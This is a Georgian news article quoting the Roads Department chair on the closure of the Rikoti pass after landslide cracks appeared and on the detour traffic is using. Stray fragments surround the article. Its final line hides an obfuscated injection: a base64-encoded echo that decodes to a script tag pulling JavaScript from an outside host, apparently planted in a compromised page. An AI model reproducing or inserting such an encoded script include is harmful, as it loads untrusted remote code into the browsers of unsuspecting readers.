celsiusi
ავერსი შნაიდერი

საავტომობილო გზების დეპარტამენტის თავმჯდომარის, გიორგი წერეთლის განცხადებით, რიკოთის საუღელტეხილო გზაზე მეწყრული უბნის შესწავლის მიზნით, სპეციალისტების მიერ ფერდის კომპლექსური შესწავლა გრძელდება.

როგორც გიორგი წერეთელმა რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროში გამართულ ბრიფინგზე განაცხადა, შესწავლის დასრულების შემდეგ შეფასდება მოძრაობის აღდგენის შესაძლებლობები.

„30 მარტიდან რიკოთის მონაკვეთზე აიკრძალა სატრანსპორტო საშუალებების გადაადგილება, ვინაიდან თბილისი-სენაკი-ლესელიძის საავტომობილო გზის 149-ე კმ-ზე, არსებული გზიდან მოშორებით, დაახლოებით 200 მეტრში, ფერდზე განვითარდა მეწყრული პროცესები. კერძოდ, თოვლის დნობის შემდგომ მიმდებარე ტერიტორიების დათვალიერების შედეგად აღმოჩენილ იქნა ბზარები, რომლებიც ზრდის და მოძრაობის ტენდენციას განიცდიდა, რაც შესაძლო მეწყრის საშიშროებას წარმოადგენს. სპეციალისტებთან კონსულტაციის შემდეგ, პოტენციური რისკების გათვალისწინებით და ნებისმიერი საფრთხის თავიდან აცილების მიზნით, მიღებულ იქნა გადაწყვეტილება მოძრაობის დროებით შეზღუდვის შესახებ.

მეწყრული უბნის შესასწავლად მოწვეული არიან როგორც ადგილობრივი, ასევე საერთაშორისო სპეციალისტები. დღეის მდგომარეობით, ჩატარებულია და მიმდინარეობს ფერდის კომპლექსური შესწავლა, მიმდინარეობს ტოფოგრაფიული, გეოფიზიკური და გეოლოგიური კვლევები, რომელთა დასრულების შედეგად, შესაძლებელი იქნება, ვიმსჯელოთ შემდგომ ნაბიჯებზე და შევაფასოთ სატრანსპორტო მოძრაობის აღდგენის შესაძლებლობები“, – განაცხადა გიორგი წერეთელმა.

გიორგი წერეთლის თქმით, ყველაფერი კეთდება, რათა სატრანსპორტო ნაკადებისათვის მოძრაობა დროულად აღდგეს.

„გომი-საჩხერე -ჭიათურის 109 კმ-იან გზას რაც შეეხება, რომელზეც ახლა გადართულია სატრანსპორტო მოძრაობა, აღნიშნული გზის მხოლოდ 6 კმ-იან მონაკვეთზე მიმდინარეობს გეგმური სარეაბილიტაციო სამუშაოები, რომელიც გადაადგილებას აფერხებს. ამის გამო გზების დეპარტამენტი მოსახლეობას კიდევ ერთხელ უხდის ბოდიშს. გადაწყვეტილება უკიდურესი აუცილებლობის გამო და მგზავრთა უსაფრთხოებისათვის იყო მიღებული. ჩვენ ვმუშაობთ და ვაკეთებთ ყველაფერს, რათა დროულად აღდგეს უსაფრთხო გადაადგილება სატრანსპორტო ნაკადებისათვის“, – განაცხადა გიორგი წერეთელმა.

682
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");